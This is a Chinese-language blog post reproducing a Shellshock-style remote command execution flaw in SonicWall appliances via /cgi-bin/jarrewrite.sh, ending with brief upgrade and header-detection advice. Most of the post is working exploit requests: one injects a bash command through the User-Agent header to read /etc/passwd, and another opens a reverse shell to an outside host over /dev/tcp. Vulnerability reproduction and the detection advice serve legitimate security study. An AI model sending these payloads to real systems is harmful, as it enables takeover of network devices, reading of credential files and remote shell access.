SonicWall远程命令执行漏洞

519 阅读1分钟

 

SonicWall 远程命令执行漏洞

一、漏洞描述

SonicWall历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall 使用了旧版本内核以及HTTP CGI 可执行程序,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限

二、漏洞复现

exp:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

访问执行查看:cat /etc/passwd

执行反弹shell

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080  User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

成功获取到shell:

简单的脚本尝试验证:

三、防护修补建议

通用修补建议

升级到 Sonic SMA 8.0.0.4

临时修补建议

针对 http header 进行检测

可能存在的特征字符串如下() { :; };

 

参考:

 my.oschina.net/u/4600927/b…

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:www.zhihu.com/people/fu-w…

个人简书:www.jianshu.com/u/bf0e38a8d…

个人CSDN:blog.csdn.net/qq_37602797…

个人博客园:www.cnblogs.com/thelostworl…

FREEBUF主页:www.freebuf.com/author/thel…

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”